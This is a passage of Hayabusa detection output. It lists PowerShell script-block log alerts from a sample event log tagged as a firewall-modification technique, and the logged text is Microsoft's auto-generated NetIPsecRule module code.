(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 